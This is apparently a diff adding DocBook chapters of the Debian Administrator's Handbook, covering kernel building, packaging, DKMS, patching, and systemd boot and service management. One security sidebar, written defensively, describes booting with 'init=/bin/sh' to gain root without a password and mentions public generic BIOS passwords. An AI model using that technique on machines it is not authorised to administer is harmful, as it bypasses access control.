+      (also available in the <emphasis role="pkg">debian-kernel-handbook</emphasis> package) with
+      comprehensive documentation about most kernel related tasks and about how
+      official Debian kernel packages are handled. This is the first place
+      you should look into if you need more information than what is
+      provided in this section.
+      <ulink type="block" url="https://kernel-team.pages.debian.net/kernel-handbook/" />
+      </para>
+    </sidebar>
+
+    <section id="sect.kernel-compilation-prerequisites">
+      <title>Introduction and Prerequisites</title>
+
+      <para>Unsurprisingly Debian manages the kernel in the form of a
+      package, which is not how kernels have traditionally been compiled
+      and installed. Since the kernel remains under
+      the control of the packaging system, it can then be removed cleanly,
+      or deployed on several machines. Furthermore, the scripts associated
+      with these packages automate the interaction with the
+      bootloader and the initrd generator.</para>
+
+      <para>The upstream Linux sources contain everything needed to build a
+      Debian package of the kernel. But you still need to install
+      <emphasis role="pkg">build-essential</emphasis> to ensure that you have
+      the tools required to build a Debian package. Furthermore, the
+      configuration step for the kernel requires the
+      <emphasis role="pkg">libncurses5-dev</emphasis> package. Finally, the
+      <emphasis role="pkg">fakeroot</emphasis> package will enable creation of the
+      Debian package without using administrator's rights.</para>
+
+      
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> The good old days of <emphasis role="pkg">kernel-package</emphasis></title>
+        <indexterm><primary><emphasis role="pkg">kernel-package</emphasis></primary></indexterm>
+
+	<para>Before the Linux build system gained the ability to build
+	proper Debian packages, the recommended way to build such packages
+	was to use <command>make-kpkg</command> from the
+	<emphasis role="pkg">kernel-package</emphasis> package.</para>
+	
+      </sidebar>
+
+    </section>
+    <section id="sect.kernel-sources">
+      <title>Getting the Sources</title>
+      <indexterm><primary>Linux kernel sources</primary></indexterm>
+      <indexterm><primary>kernel</primary><secondary>sources</secondary></indexterm>
+      <indexterm><primary>source</primary><secondary>of the Linux kernel</secondary></indexterm>
+
+      <para>Like anything that can be useful on a Debian system, the Linux
+      kernel sources are available in a package. To retrieve them, just
+      install the <emphasis role="pkg">linux-source-<replaceable>version</replaceable></emphasis>
+      package. The <command>apt search ^linux-source</command>
+      command lists the various kernel versions packaged by Debian. The
+      latest version is available in the <emphasis role="distribution">Unstable</emphasis> distribution: you can
+      retrieve them without much risk (especially if your APT is configured
+      according to the instructions of <xref linkend="sect.apt-mix-distros" />). Note that the source code
+      contained in these packages does not correspond precisely with that
+      published by Linus Torvalds and the kernel developers; like all
+      distributions, Debian applies a number of patches, which might (or
+      might not) find their way into the upstream version of Linux. These
+      modifications include backports of fixes/features/drivers from newer
+      kernel versions, new features not yet (entirely) merged in the upstream
+      Linux tree, and sometimes even Debian specific changes.</para>
+
+      <para>The remainder of this section focuses on the 4.9 version of
+      the Linux kernel, but the examples can, of course, be adapted to the
+      particular version of the kernel that you want.</para>
+
+      <para>We assume the <emphasis role="pkg">linux-source-4.9</emphasis> package has been installed.
+      It contains
+      <filename>/usr/src/linux-source-4.9.tar.xz</filename>, a
+      compressed archive of the kernel sources. You must extract these
+      files in a new directory (not directly under
+      <filename>/usr/src/</filename>, since there is no need for special
+      permissions to compile a Linux kernel):
+      <filename>~/kernel/</filename> is appropriate.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>mkdir ~/kernel; cd ~/kernel</userinput>
+<computeroutput>$ </computeroutput><userinput>tar -xaf /usr/src/linux-source-4.9.tar.xz</userinput>
+</screen>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> Location of kernel sources</title>
+
+	<para>Traditionally, Linux kernel sources would be placed in
+	<filename>/usr/src/linux/</filename> thus requiring root
+	permissions for compilation. However, working with administrator
+	rights should be avoided when not needed. There is a
+	<literal>src</literal> group that allows members to work in this
+	directory, but working in <filename>/usr/src/</filename> should be
+	avoided nevertheless. By keeping the kernel sources in a personal
+	directory, you get security on all counts: no files in
+	<filename>/usr/</filename> unknown to the packaging system, and
+	no risk of misleading programs that read
+	<filename>/usr/src/linux</filename> when trying to gather
+	information on the used kernel.</para>
+      </sidebar>
+    </section>
+    <section id="sect.config-kernel">
+      <title>Configuring the Kernel</title>
+      <indexterm><primary>kernel</primary><secondary>configuration</secondary></indexterm>
+      <indexterm><primary>configuration</primary><secondary>of the kernel</secondary></indexterm>
+      <indexterm><primary><filename>.config</filename></primary></indexterm>
+
+      <para>The next step consists of configuring the kernel according to
+      your needs. The exact procedure depends on the goals.</para>
+
+      <para>When recompiling a more recent version of the kernel (possibly
+      with an additional patch), the configuration will most likely be kept
+      as close as possible to that proposed by Debian. In this case, and
+      rather than reconfiguring everything from scratch, it is sufficient
+      to copy the
+      <filename>/boot/config-<replaceable>version</replaceable></filename>
+      file (the version is that of the kernel currently used, which can be
+      found with the <command>uname -r</command> command) into a
+      <filename>.config</filename> file in the directory containing the
+      kernel sources.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>cp /boot/config-4.9.0-3-amd64 ~/kernel/linux-source-4.9/.config</userinput>
+</screen>
+
+      <para>Unless you need to change the configuration, you can stop here
+      and skip to <xref linkend="sect.kernel-build" />. If you need to change it, on the other
+      hand, or if you decide to reconfigure everything from scratch, you
+      must take the time to configure your kernel. There are various
+      dedicated interfaces in the kernel source directory that can be used
+      by calling the <command>make
+      <replaceable>target</replaceable></command> command, where
+      <replaceable>target</replaceable> is one of the values described
+      below.</para>
+
+      <para><command>make menuconfig</command> compiles and executes a
+      text-mode interface (this is where the <emphasis role="pkg">libncurses5-dev</emphasis> package is required) which
+      allows navigating the options available in a hierarchical structure.
+      Pressing the <keycap>Space</keycap> key changes the value of the
+      selected option, and <keycap>Enter</keycap> validates the button
+      selected at the bottom of the screen; <guibutton>Select</guibutton>
+      returns to the selected sub-menu; <guibutton>Exit</guibutton> closes
+      the current screen and moves back up in the hierarchy;
+      <guibutton>Help</guibutton> will display more detailed information on
+      the role of the selected option. The arrow keys allow moving within the
+      list of options and buttons. To exit the configuration program,
+      choose <guibutton>Exit</guibutton> from the main menu. The program
+      then offers to save the changes you've made; accept if you are
+      satisfied with your choices.</para>
+
+      <para>Other interfaces have similar features, but they work within
+      more modern graphical interfaces; such as <command>make
+      xconfig</command> which uses a Qt graphical interface, and
+      <command>make gconfig</command> which uses GTK+. The former requires
+      <emphasis role="pkg">libqt4-dev</emphasis>, while the latter
+      depends on <emphasis role="pkg">libglade2-dev</emphasis> and
+      <emphasis role="pkg">libgtk2.0-dev</emphasis>.</para>
+
+      <para>When using one of those configuration interfaces, it is always
+      a good idea to start from a reasonable default configuration. The
+      kernel provides such configurations in
+      <filename>arch/<replaceable>arch</replaceable>/configs/*_defconfig</filename>
+      and you can put your selected configuration in place with a command
+      like <command>make x86_64_defconfig</command> (in the case of a
+      64-bit PC) or <command>make i386_defconfig</command> (in the case of
+      a 32-bit PC).</para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Dealing with outdated <filename>.config</filename> files</title>
+
+	<para>When you provide a <filename>.config</filename> file that has been
+	generated with another (usually older) kernel version, you will have to
+	update it. You can do so with <command>make oldconfig</command>, it will
+	interactively ask you the questions corresponding to the new
+	configuration options. If you want to use the default answer to
+	all those questions you can use <command>make
+	olddefconfig</command>. With <command>make oldnoconfig</command>,
+	it will assume a negative answer to all questions.</para>
+      </sidebar>
+    </section>
+    <section id="sect.kernel-build">
+      <title>Compiling and Building the Package</title>
+      <indexterm><primary><command>make deb-pkg</command></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Clean up before rebuilding</title>
+
+	<para>If you have already compiled once in the directory and wish
+	to rebuild everything from scratch (for example because you substantially
+	changed the kernel configuration), you will have to run
+	<command>make clean</command> to remove the compiled files.
+	<command>make distclean</command> removes even more generated files,
+	including your <filename>.config</filename> file too, so make sure to
+	backup it first.</para>
+      </sidebar>
+
+      <para>Once the kernel configuration is ready, a simple <command>make
+      deb-pkg</command> will generate up to 5 Debian packages: <emphasis role="pkg">linux-image-<replaceable>version</replaceable></emphasis>
+      that contains the kernel image and the associated modules,
+      <emphasis role="pkg">linux-headers-<replaceable>version</replaceable></emphasis>
+      which contains the header files required to build external modules,
+      <emphasis role="pkg">linux-firmware-image-<replaceable>version</replaceable></emphasis>
+      which contains the firmware files needed by some drivers (this package
+      might be missing when you build from the kernel sources provided by Debian),
+      <emphasis role="pkg">linux-image-<replaceable>version</replaceable>-dbg</emphasis>
+      which contains the debugging symbols for the kernel image and its modules,
+      and <emphasis role="pkg">linux-libc-dev</emphasis> which contains headers
+      relevant to some user-space libraries like GNU glibc.</para>
+
+      <para>The <replaceable>version</replaceable> is defined by the concatenation
+      of the upstream version (as defined by the variables <literal>VERSION</literal>,
+      <literal>PATCHLEVEL</literal>, <literal>SUBLEVEL</literal> and
+      <literal>EXTRAVERSION</literal> in the <filename>Makefile</filename>),
+      of the <literal>LOCALVERSION</literal> configuration parameter,
+      and of the <literal>LOCALVERSION</literal> environment variable. The package
+      version reuses the same version string with an appended revision
+      that is regularly incremented (and stored in <filename>.version</filename>),
+      except if you override it with the
+      <literal>KDEB_PKGVERSION</literal> environment variable.
+      </para>
+
+      <screen><computeroutput>$ </computeroutput><userinput>make deb-pkg LOCALVERSION=-falcot KDEB_PKGVERSION=$(make kernelversion)-1
+</userinput><computeroutput>[...]
+$ </computeroutput><userinput>ls ../*.deb
+</userinput><computeroutput>../linux-headers-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot-dbg_4.9.30-1_amd64.deb
+../linux-libc-dev_4.9.30-1_amd64.deb
+</computeroutput></screen>
+    </section>
+    <section id="sect.modules-build">
+      <title>Compiling External Modules</title>
+      <indexterm><primary>kernel</primary><secondary>external modules</secondary></indexterm>
+      <indexterm><primary>modules</primary><secondary>external kernel modules</secondary></indexterm>
+      <indexterm><primary><command>dkms</command></primary></indexterm>
+
+      <para>Some modules are maintained outside of the official Linux
+      kernel. To use them, they must be compiled alongside the
+      matching kernel. A number of common third party modules are
+      provided by Debian in dedicated packages, such as <emphasis role="pkg">xtables-addons-source</emphasis> (extra modules for
+      iptables) or <emphasis role="pkg">oss4-source</emphasis> (Open
+      Sound System, some alternative audio drivers).</para>
+
+      <para>These external packages are many and varied and we won't list
+      them all here; the <command>apt-cache search source$</command>
+      command can narrow down the search field. However, a complete list
+      isn't particularly useful since there is no particular reason for
+      compiling external modules except when you know you need it. In such
+      cases, the device's documentation will typically detail the specific
+      module(s) it needs to function under Linux.</para>
+
+      <para>For example, let's look at the <emphasis role="pkg">xtables-addons-source</emphasis> package: after installation, a
+      <filename>.tar.bz2</filename> of the module's sources is stored in
+      <filename>/usr/src/</filename>. While we could manually extract
+      the tarball and build the module, in practice we prefer to automate
+      all this using DKMS. Most modules offer the required DKMS integration
+      in a package ending with a <literal>-dkms</literal> suffix. In our case,
+      installing <emphasis role="pkg">xtables-addons-dkms</emphasis> is all that is
+      needed to compile the kernel module for the current kernel provided that
+      we have the <emphasis role="pkg">linux-headers-*</emphasis> package
+      matching the installed kernel. For instance, if you use
+      <emphasis role="pkg">linux-image-amd64</emphasis>, you would
+      also install <emphasis role="pkg">linux-headers-amd64</emphasis>.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>sudo apt install xtables-addons-dkms</userinput>
+<computeroutput>
+[...]
+Setting up xtables-addons-dkms (2.12-0.1) ...
+Loading new xtables-addons-2.12 DKMS files...
+Building for 4.9.0-3-amd64
+Building initial module for 4.9.0-3-amd64
+Done.
+
+xt_ACCOUNT:
+Running module version sanity check.
+ - Original module
+   - No original module exists within this kernel
+ - Installation
+   - Installing to /lib/modules/4.9.0-3-amd64/updates/dkms/
+[...]
+DKMS: install completed.
+$ </computeroutput><userinput>sudo dkms status</userinput>
+<computeroutput>xtables-addons, 2.12, 4.9.0-3-amd64, x86_64: installed
+$ </computeroutput><userinput>sudo modinfo xt_ACCOUNT</userinput>
+<computeroutput>filename:       /lib/modules/4.9.0-3-amd64/updates/dkms/xt_ACCOUNT.ko
+license:        GPL
+alias:          ipt_ACCOUNT
+author:         Intra2net AG &lt;opensource@intra2net.com&gt;
+description:    Xtables: per-IP accounting for large prefixes
+[...]
+</computeroutput>
+</screen>
+
+      <sidebar>
+        <title><emphasis>ALTERNATIVE</emphasis> module-assistant</title>
+        <indexterm><primary><emphasis role="pkg">module-assistant</emphasis></primary></indexterm>
+
+	<para>Before DKMS, <emphasis role="pkg">module-assistant</emphasis> was the simplest
+	solution to build and deploy kernel modules. It can still be
+	used, in particular for packages lacking DKMS integration:
+	with a simple command like <command>module-assistant
+	auto-install xtables-addons</command> (or <command>m-a a-i
+	xtables-addons</command> for short), the modules are compiled
+	for the current kernel, put in a new Debian package, and that
+	package gets installed on the fly.
+	</para>
+      </sidebar>
+    </section>
+    <section id="sect.kernel-patch">
+      <title>Applying a Kernel Patch</title>
+      <indexterm><primary>kernel</primary><secondary>patch</secondary></indexterm>
+      <indexterm><primary>patch of the kernel</primary></indexterm>
+
+      <para>Some features are not included in the standard kernel due to a
+      lack of maturity or to some disagreement with the kernel maintainers.
+      Such features may be distributed as patches that anyone is then free
+      to apply to the kernel sources.</para>
+
+      <para>
+        Debian sometimes provides some of these patches in <emphasis role="pkg">linux-patch-*</emphasis> packages but they
+        often don't make it into stable releases (sometimes for the very
+        same reasons that they are not merged into the official upstream
+        kernel). These packages install files in the
+        <filename>/usr/src/kernel-patches/</filename> directory.
+      </para>
+
+      <para>To apply one or more of these installed patches, use the
+      <command>patch</command> command in the sources directory then start
+      compilation of the kernel as described above.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>cd ~/kernel/linux-source-4.9</userinput>
+<computeroutput>$ </computeroutput><userinput>make clean</userinput>
+<computeroutput>$ </computeroutput><userinput>zcat /usr/src/kernel-patches/diffs/grsecurity2/grsecurity-3.1-4.9.11-201702181444.patch.gz | patch -p1</userinput>
+</screen>
+
+      <para>Note that a given patch may not necessarily work with every
+      version of the kernel; it is possible for <command>patch</command> to
+      fail when applying them to kernel sources. An error message will be
+      displayed and give some details about the failure; in this case,
+      refer to the documentation available in the Debian package of the
+      patch (in the <filename>/usr/share/doc/linux-patch-*/</filename>
+      directory). In most cases, the maintainer indicates for which kernel
+      versions their patch is intended.</para>
+    </section>
+  </section>
+  <section id="sect.kernel-installation">
+    <title>Installing a Kernel</title>
+    <indexterm><primary>installation</primary><secondary>of a kernel</secondary></indexterm>
+    <indexterm><primary>kernel</primary><secondary>installation</secondary></indexterm>
+    <section id="sect.kernel-package">
+      <title>Features of a Debian Kernel Package</title>
+
+      <indexterm><primary><filename>vmlinuz</filename></primary></indexterm>
+
+      <para>A Debian kernel package installs the kernel image
+      (<filename>vmlinuz-<replaceable>version</replaceable></filename>),
+      its configuration
+      (<filename>config-<replaceable>version</replaceable></filename>) and
+      its symbols table
+      (<filename>System.map-<replaceable>version</replaceable></filename>)
+      in <filename>/boot/</filename>. The symbols table helps
+      developers understand the meaning of a kernel error message; without
+      it, kernel “oopses” (an “oops” is the kernel equivalent
+      of a segmentation fault for user-space programs, in other
+      words messages generated following an invalid pointer dereference)
+      only contain numeric memory addresses, which is useless information
+      without the table mapping these addresses to symbols and function
+      names. The modules are installed in the
+      <filename>/lib/modules/<replaceable>version</replaceable>/</filename>
+      directory.</para>
+
+      <para>The package's configuration scripts automatically generate an
+      initrd image, which is a mini-system designed to be loaded in memory
+      (hence the name, which stands for “init ramdisk”) by the
+      bootloader, and used by the Linux kernel solely for loading the
+      modules needed to access the devices containing the complete Debian
+      system (for example, the driver for SATA disks). Finally, the
+      post-installation scripts update the symbolic links
+      <filename>/vmlinuz</filename>, <filename>/vmlinuz.old</filename>,
+      <filename>/initrd.img</filename> and
+      <filename>/initrd.img.old</filename> so that they point to the latest
+      two kernels installed, respectively, as well as the corresponding
+      initrd images.</para>
+
+      <para>Most of those tasks are offloaded to hook scripts in
+      the <filename>/etc/kernel/*.d/</filename> directories. For instance,
+      the integration with <command>grub</command> relies on
+      <filename>/etc/kernel/postinst.d/zz-update-grub</filename>
+      and <filename>/etc/kernel/postrm.d/zz-update-grub</filename>
+      to call <command>update-grub</command> when kernels
+      are installed or removed.</para>
+    </section>
+    <section id="sect.kernel-installation-with-dpkg">
+      <title>Installing with <command>dpkg</command></title>
+
+      <para>Using <command>apt</command> is so convenient that it makes
+      it easy to forget about the lower-level tools, but the easiest way of
+      installing a compiled kernel is to use a command such as
+      <command>dpkg -i <replaceable>package</replaceable>.deb</command>,
+      where <literal><replaceable>package</replaceable>.deb</literal> is
+      the name of a <emphasis role="pkg">linux-image</emphasis> package
+      such as
+      <filename>linux-image-4.9.30-ckt4-falcot_1_amd64.deb</filename>.</para>
+
+      <para>The configuration steps described in this chapter are basic and
+      can lead both to a server system or a workstation, and it can be
+      massively duplicated in semi-automated ways. However, it is not
+      enough by itself to provide a fully configured system. A few pieces
+      are still in need of configuration, starting with low-level programs
+      known as the “Unix services”.</para>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/09_unix-services.xml b/tmp/cs-CZ/xml_tmp/09_unix-services.xml
new file mode 100644
index 000000000..d4f3aa121
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/09_unix-services.xml
@@ -0,0 +1,2842 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="unix-services">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-unix-services.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>System boot</keyword>
+      <keyword>Initscripts</keyword>
+      <keyword>SSH</keyword>
+      <keyword>Telnet</keyword>
+      <keyword>Rights</keyword>
+      <keyword>Permissions</keyword>
+      <keyword>Supervision</keyword>
+      <keyword>Inetd</keyword>
+      <keyword>Cron</keyword>
+      <keyword>Backup</keyword>
+      <keyword>Hotplug</keyword>
+      <keyword>PCMCIA</keyword>
+      <keyword>APM</keyword>
+      <keyword>ACPI</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Unix Services</title>
+  <highlights>
+    <para>This chapter covers a number of basic services that are common to
+    many Unix systems. All administrators should be familiar with
+    them.</para>
+  </highlights>
+  <section id="sect.system-boot">
+    <title>System Boot</title>
+    <indexterm><primary>booting</primary><secondary>the system</secondary></indexterm>
+
+    <para>When you boot the computer, the many messages scrolling by on the
+    console display many automatic initializations and configurations that
+    are being executed. Sometimes you may wish to slightly alter how this
+    stage works, which means that you need to understand it well. That is
+    the purpose of this section.</para>
+
+    
+    <para>First, the BIOS takes control of the computer, detects the disks,
+    loads the <emphasis>Master Boot Record</emphasis>, and executes the
+    bootloader. The bootloader takes over, finds the kernel on the disk,
+    loads and executes it. The kernel is then initialized, and starts to
+    search for and mount the partition containing the root filesystem, and
+    finally executes the first program — <command>init</command>.
+    Frequently, this “root partition” and this <command>init</command>
+    are, in fact, located in a virtual filesystem that only exists in RAM
+    (hence its name, “initramfs”, formerly called “initrd” for
+    “initialization RAM disk”). This filesystem is loaded in memory by
+    the bootloader, often from a file on a hard drive or from the network.
+    It contains the bare minimum required by the kernel to load the
+    “true” root filesystem: this may be driver modules for the hard
+    drive, or other devices without which the system cannot boot, or, more
+    frequently, initialization scripts and modules for assembling RAID
+    arrays, opening encrypted partitions, activating LVM volumes, etc. Once
+    the root partition is mounted, the initramfs hands over control to the
+    real init, and the machine goes back to the standard boot
+    process.</para>
+
+    <figure id="figure.boot-process-systemd">
+      <title>Boot sequence of a computer running Linux with systemd</title>
+      <mediaobject>
+        <imageobject>
+          <imagedata fileref="images/startup-systemd.png" scalefit="1" width="80%" />
+        </imageobject>
+      </mediaobject>
+    </figure>
+
+    <section id="sect.systemd"><title>The systemd init system</title>
+
+    <para>The “real init” is currently provided by <emphasis role="pkg">systemd</emphasis> and this section documents this init
+    system. </para>
+
+    <sidebar>
+      <title><emphasis>CULTURE</emphasis> Before <command>systemd</command></title>
+
+      <para><command>systemd</command> is a relatively recent “init
+      system”, and although it was already available, to a certain
+      extent, in <emphasis role="distribution">Wheezy</emphasis>, it
+      has only become the default in Debian <emphasis role="distribution">Jessie</emphasis>.  Previous releases
+      relied, by default, on the “System V init” (in the <emphasis role="pkg">sysv-rc</emphasis> package), a much more traditional
+      system.  We describe the System V init later on.</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> Other boot systems</title>
+
+      <para>This book describes the boot system used by default in
+      Debian <emphasis role="distribution">Jessie</emphasis> (as
+      implemented by the <emphasis role="pkg">systemd</emphasis>
+      package), as well as the previous default, <emphasis role="pkg">sysvinit</emphasis>, which is derived and inherited
+      from <emphasis>System V</emphasis> Unix systems; there are
+      others.</para>
+
+      <para><emphasis role="pkg">file-rc</emphasis> is a boot system
+      with a very simple process. It keeps the principle of runlevels, but
+      replaces the directories and symbolic links with a configuration
+      file, which indicates to <command>init</command> the processes that
+      must be started and their launch order.</para>
+
+      <para>The <command>upstart</command> system is still not
+      perfectly tested on Debian. It is event based: init scripts are
+      no longer executed in a sequential order but in response to
+      events such as the completion of another script upon which they
+      are dependent. This system, started by Ubuntu, is present in
+      Debian <emphasis role="distribution">Jessie</emphasis>, but is
+      not the default; it comes, in fact, as a replacement for
+      <emphasis role="pkg">sysvinit</emphasis>, and one of the tasks
+      launched by <command>upstart</command> is to launch the scripts
+      written for traditional systems, especially those from the
+      <emphasis role="pkg">sysv-rc</emphasis> package.</para>
+
+      <para>There are also other systems and other operating modes, such as
+      <command>runit</command> or <command>minit</command>, but they are
+      relatively specialized and not widespread.</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>SPECIFIC CASE</emphasis> Booting from the network</title>
+
+      <para>In some configurations, the BIOS may be configured not to
+      execute the MBR, but to seek its equivalent on the network, making it
+      possible to build computers without a hard drive, or which are
+      completely reinstalled on each boot. This option is not available on
+      all hardware and it generally requires an appropriate combination of
+      BIOS and network card.</para>
+
+      <para>Booting from the network can be used to launch the
+      <command>debian-installer</command> or FAI (see <xref linkend="sect.installation-methods" />).</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> The process, a program instance</title>
+      <indexterm><primary>process</primary></indexterm>
+
+      <para>A process is the representation in memory of a running program.
+      It includes all of the information necessary for the proper execution
+      of the software (the code itself, but also the data that it has in
+      memory, the list of files that it has opened, the network connections
+      it has established, etc.). A single program may be instantiated into
+      several processes, not necessarily running under different user
+      IDs.</para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>SECURITY</emphasis> Using a shell as <command>init</command> to gain root rights</title>
+
+      <para>By convention, the first process that is booted is the
+      <command>init</command> program (which is a symbolic link to
+      <filename>/lib/systemd/systemd</filename> by default). However,
+      it is possible to pass an <literal>init</literal> option to the
+      kernel indicating a different program.</para>
+      <indexterm><primary><command>init</command></primary></indexterm>
+
+      <para>Any person who is able to access the computer can press the
+      <keycap>Reset</keycap> button, and thus reboot it. Then, at the
+      bootloader's prompt, it is possible to pass the
+      <literal>init=/bin/sh</literal> option to the kernel to gain root
+      access without knowing the administrator's password.</para>
+
+      <para>To prevent this, you can protect the bootloader itself with a
+      password. You might also think about protecting access to the BIOS (a
+      password protection mechanism is almost always available), without
+      which a malicious intruder could still boot the machine on a
+      removable media containing its own Linux system, which they could
+      then use to access data on the computer's hard drives.</para>
+
+      <para>Finally, be aware that most BIOS have a generic password
+      available. Initially intended for troubleshooting for those who have
+      forgotten their password, these passwords are now public and
+      available on the Internet (see for yourself by searching for
+      “generic BIOS passwords” in a search engine). All of these
+      protections will thus impede unauthorized access to the machine
+      without being able to completely prevent it. There is no reliable way
+      to protect a computer if the attacker can physically access it; they
+      could dismount the hard drives to connect them to a computer under
+      their own control anyway, or even steal the entire machine, or erase
+      the BIOS memory to reset the password…</para>
+    </sidebar>
+
+
+<para>Systemd executes several processes, in charge of setting up the
+system: keyboard, drivers, filesystems, network, services.  It does
+this while keeping a global view of the system as a whole, and the
+requirements of the components.  Each component is described by a
+“unit file” (sometimes more); the general syntax is derived from the
+widely-used “*.ini files“ syntax, with
+<literal><replaceable>key</replaceable> =
+<replaceable>value</replaceable></literal> pairs grouped between
+<literal>[<replaceable>section</replaceable>]</literal> headers.  Unit
+files are stored under <filename>/lib/systemd/system/</filename> and
+<filename>/etc/systemd/system/</filename>; they come in several
+flavours, but we will focus on “services” and “targets” here.
+</para>
+
+<para>A systemd “service file” describes a process managed by systemd.
+It contains roughly the same information as old-style init-scripts,
+but expressed in a declaratory (and much more concise) way.
+Systemd handles the bulk of the repetitive tasks (starting and
+stopping the process, checking its status, logging, dropping
+privileges, and so on), and the service file only needs to fill in the
+specifics of the process.  For instance, here is the service file for SSH:</para>
+
+<programlisting>[Unit]
+Description=OpenBSD Secure Shell server
+After=network.target auditd.service
+ConditionPathExists=!/etc/ssh/sshd_not_to_be_run
+
+[Service]
+EnvironmentFile=-/etc/default/ssh
+ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
+ExecReload=/bin/kill -HUP $MAINPID
+KillMode=process
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+Alias=sshd.service
+</programlisting>
+
+<para>As you can see, there is very little code in there, only
+declarations.  Systemd takes care of displaying progress reports,
+keeping track of the processes, and even restarting them when
+needed.</para>
+
+<para>A systemd “target file” describes a state of the system, where a
+set of services are known to be operational.  It can be thought of as
+an equivalent of the old-style runlevel.  One of the targets is
+<literal>local-fs.target</literal>; when it is reached, the rest of
+the system can assume that all local filesystems are mounted and
+accessible.  Other targets include
+<literal>network-online.target</literal> and
+<literal>sound.target</literal>.  The dependencies of a target can be
+listed either within the target file (in the
+<literal>Requires=</literal> line), or using a symbolic link to a
+service file in the
+<literal>/lib/systemd/system/<replaceable>targetname</replaceable>.target.wants/</literal>
+directory.  For instance,
+<filename>/etc/systemd/system/printer.target.wants/</filename>
+contains a link to
+<filename>/lib/systemd/system/cups.service</filename>; systemd will
+therefore ensure CUPS is running in order to reach
+<literal>printer.target</literal>.
+</para>
+
+<para>Since unit files are declarative rather than scripts or
+programs, they cannot be run directly, and they are only interpreted
+by systemd; several utilities therefore allow the administrator to
+interact with systemd and control the state of the system and of each
+component.</para>
+
+<para>The first such utility is <command>systemctl</command>.  When
+run without any arguments, it lists all the unit files known to
+systemd (except those that have been disabled), as well as their
+status.  <command>systemctl status</command> gives a better view of
+the services, as well as the related processes.  If given the name of
+a service (as in <command>systemctl status ntp.service</command>), it
+returns even more details, as well as the last few log lines related
+to the service (more on that later).</para>
+
+<para>Starting a service by hand is a simple matter of running
+<command>systemctl start
+<replaceable>servicename</replaceable>.service</command>.  As one can
+guess, stopping the service is done with <command>systemctl stop
+<replaceable>servicename</replaceable>.service</command>; other
+subcommands include <command>reload</command> and
+<command>restart</command>.</para>
+
+<para>To control whether a service is active (i.e. whether it will get
+started automatically on boot), use <command>systemctl enable
+<replaceable>servicename</replaceable>.service</command> (or
+<command>disable</command>).  <command>is-enabled</command> allows
+checking the status of the service.</para>
+
+<para>An interesting feature of systemd is that it includes a logging
+component named <command>journald</command>.  It comes as a complement
+to more traditional logging systems such as
+<command>syslogd</command>, but it adds interesting features such as a
+formal link between a service and the messages it generates, and the
+ability to capture error messages generated by its initialisation
+sequence.  The messages can be displayed later on, with a little help
+from the <command>journalctl</command> command.  Without any
+arguments, it simply spews all log messages that occurred since system
+boot; it will rarely be used in such a manner.  Most of the time, it
+will be used with a service identifier:</para>
+
+<screen><computeroutput># </computeroutput><userinput>journalctl -u ssh.service
+</userinput><computeroutput>-- Logs begin at Tue 2015-03-31 10:08:49 CEST, end at Tue 2015-03-31 17:06:02 CEST. --
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:08:55 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Received SIGHUP; restarting.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on 0.0.0.0 port 22.
+Mar 31 10:09:00 mirtuel sshd[430]: Server listening on :: port 22.
+Mar 31 10:09:32 mirtuel sshd[1151]: Accepted password for roland from 192.168.1.129 port 53394 ssh2
+Mar 31 10:09:32 mirtuel sshd[1151]: pam_unix(sshd:session): session opened for user roland by (uid=0)
+</computeroutput></screen>
+
+<para>Another useful command-line flag is <command>-f</command>, which
+instructs <command>journalctl</command> to keep displaying new
+messages as they are emitted (much in the manner of <command>tail -f
+<replaceable>file</replaceable></command>).</para>
+
+<para>If a service doesn't seem to be working as expected, the first
+step to solve the problem is to check that the service is actually
+running with <command>systemctl status</command>; if it is not, and
+the messages given by the first command are not enough to diagnose the
+problem, check the logs gathered by journald about that service.  For
+instance, assume the SSH server doesn't work:</para>
+
+<screen><computeroutput># </computeroutput><userinput>systemctl status ssh.service
+</userinput><computeroutput>● ssh.service - OpenBSD Secure Shell server
+   Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
+   Active: failed (Result: start-limit) since Tue 2015-03-31 17:30:36 CEST; 1s ago
+  Process: 1023 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
+  Process: 1188 ExecStart=/usr/sbin/sshd -D $SSHD_OPTS (code=exited, status=255)
+ Main PID: 1188 (code=exited, status=255)
+
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service: main process exited, code=exited, status=255/n/a
+Mar 31 17:30:36 mirtuel systemd[1]: Unit ssh.service entered failed state.
+Mar 31 17:30:36 mirtuel systemd[1]: ssh.service start request repeated too quickly, refusing to start.
+Mar 31 17:30:36 mirtuel systemd[1]: Failed to start OpenBSD Secure Shell server.
